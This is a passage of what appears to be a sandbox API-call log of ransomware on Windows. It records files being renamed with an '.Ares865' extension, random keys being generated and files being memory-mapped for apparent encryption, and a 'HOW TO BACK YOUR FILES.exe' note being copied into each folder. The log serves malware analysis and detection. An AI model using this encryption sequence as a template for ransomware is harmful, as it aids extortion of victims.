"c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk.ares865"), dwFlags=0x1) returned 1 [0068.552] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.552] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1268) returned 1 [0068.553] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.553] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.553] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.553] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x154 [0068.555] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0068.564] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.565] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.565] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk.Ares865") returned 105 [0068.565] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk.ares865"), dwFlags=0x1) returned 1 [0068.567] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.567] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1320) returned 1 [0068.567] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.568] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.568] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.568] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x154 [0068.569] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x190000 [0068.573] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.574] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.574] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.575] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk.Ares865") returned 97 [0068.575] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk.ares865"), dwFlags=0x1) returned 1 [0068.576] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.576] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1316) returned 1 [0068.576] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.577] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.577] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.577] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x154 [0068.578] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x190000 [0068.580] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.581] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.581] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.581] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility" [0068.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0068.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0068.581] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility") returned 64 [0068.581] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility" | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility" [0068.581] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0068.581] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\accessibility\\how to back your files.exe"), bFailIfExists=1) returned 0 [0068.582] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.582] GetLastError () returned 0x0 [0068.582] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.Ares865") returned 84 [0068.582] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\accessibility\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0068.583] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\accessibility\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.584] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=370) returned 1 [0068.584] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.584] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.584] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.585] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x480, lpName=0x0) returned 0x154 [0068.586] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x480) returned 0x190000 [0068.586] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.587] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.587] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.591] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk.Ares865") returned 95 [0068.592] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk.ares865"), dwFlags=0x1) returned 1 [0068.595] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.595] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1388) returned 1 [0068.595] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.596] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.596] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.596] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x870, lpName=0x0) returned 0x154 [0068.598] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x870) returned 0x190000 [0068.604] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.605] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.605] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.605] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache") returned="C:\\Users\\All Users\\Package Cache" [0068.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eea10 | out: hHeap=0x2b0000) returned 1 [0068.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0068.605] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache") returned 32 [0068.605] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache" | out: lpString1="C:\\Users\\All Users\\Package Cache") returned="C:\\Users\\All Users\\Package Cache" [0068.605] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0068.605] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0068.606] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.606] GetLastError () returned 0x0 [0068.606] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0068.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2ea0 | out: hHeap=0x2b0000) returned 1 [0068.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2680 | out: hHeap=0x2b0000) returned 1 [0068.607] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 82 [0068.607] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0068.607] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0068.607] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0068.607] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.607] GetLastError () returned 0x0 [0068.608] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0068.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0068.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2680 | out: hHeap=0x2b0000) returned 1 [0068.608] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned 91 [0068.608] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0068.608] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0068.608] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0068.608] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.608] GetLastError () returned 0x0 [0068.609] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0068.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d36d8 | out: hHeap=0x2b0000) returned 1 [0068.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2680 | out: hHeap=0x2b0000) returned 1 [0068.609] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned 115 [0068.609] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0068.609] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0068.609] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0068.609] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.609] GetLastError () returned 0x0 [0068.610] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.Ares865") returned 132 [0068.610] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0068.611] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.611] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4932896) returned 1 [0068.611] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.612] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.612] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.612] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b4820, lpName=0x0) returned 0x154 [0068.617] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0xb4820) returned 0x2ad0000 [0068.970] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.974] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.974] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.002] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.Ares865") returned 152 [0069.004] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.ares865"), dwFlags=0x1) returned 1 [0069.008] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.010] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=143360) returned 1 [0069.011] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0069.033] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0069.033] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.047] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x23300, lpName=0x0) returned 0x154 [0069.104] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23300) returned 0x420000 [0069.184] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0069.190] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: 